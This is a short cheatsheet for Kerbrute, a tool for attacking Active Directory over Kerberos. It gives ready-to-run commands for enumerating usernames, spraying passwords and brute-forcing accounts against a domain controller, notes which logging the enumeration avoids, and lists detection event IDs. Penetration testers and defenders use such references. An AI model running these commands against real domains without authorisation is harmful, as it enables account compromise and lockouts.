Kerbrute Cheatsheet
Fast Kerberos pre-authentication brute-forcer for username enumeration and password spraying.
- GitHub: https://github.com/ropnop/kerbrute
- Does not generate event ID 4625 (logon failure) during username enumeration
- Generates event ID 4768 (TGT request) if Kerberos logging is enabled
- Username enumeration does not cause account lockouts
- Password spraying does count toward lockout thresholds
Basic Syntax
kerbrute <command> [flags]
Commands
| Command | Description |
|---|---|
userenum | Enumerate valid AD usernames via Kerberos |
passwordspray | Spray a single password against a list of users |
bruteuser | Brute-force a single user’s password |
bruteforce | Brute-force using user:password combo list |
Global Flags
| Flag | Description |
|---|---|
-d DOMAIN | Domain to authenticate against (required) |
--dc IP | Domain Controller IP or hostname |
-t THREADS | Number of threads (default: 10) |
-o FILE | Output file for results |
--safe | Safe mode — abort if any account is locked out |
--downgrade | Downgrade to ARCFOUR-HMAC-MD5 encryption |
-v | Verbose output |
Username Enumeration
Enumerate Valid Users from Wordlist
kerbrute userenum -d domain.local --dc 172.16.5.5 /path/to/userlist.txt
With Output File
kerbrute userenum -d domain.local --dc 172.16.5.5 -o valid_users.txt /path/to/userlist.txt
How it works: Sends AS-REQ without pre-authentication. If the KDC responds with PRINCIPAL UNKNOWN, the user doesn’t exist. If it prompts for pre-auth, the user is valid.
Password Spraying
Spray Single Password
kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'
Safe Mode (Stop on Lockout)
kerbrute passwordspray -d domain.local --dc 172.16.5.5 --safe valid_users.txt 'Welcome1'
Brute-Force Single User
kerbrute bruteuser -d domain.local --dc 172.16.5.5 /path/to/passwords.txt jsmith
Brute-Force with Combo List
File format: user:password (one per line)
kerbrute bruteforce -d domain.local --dc 172.16.5.5 combos.txt
Useful Username Wordlists
| List | Description |
|---|---|
jsmith.txt | 48,705 flast format names |
jsmith2.txt | Extended flast list |
top-usernames-shortlist.txt | Common usernames |
Source: statistically-likely-usernames
Detection Notes
| Action | Event ID | Notes |
|---|---|---|
| Username enumeration | 4768 | Only if Kerberos logging enabled via Group Policy |
| Password spraying | 4768 + 4771 | Failed pre-auth counts toward lockout |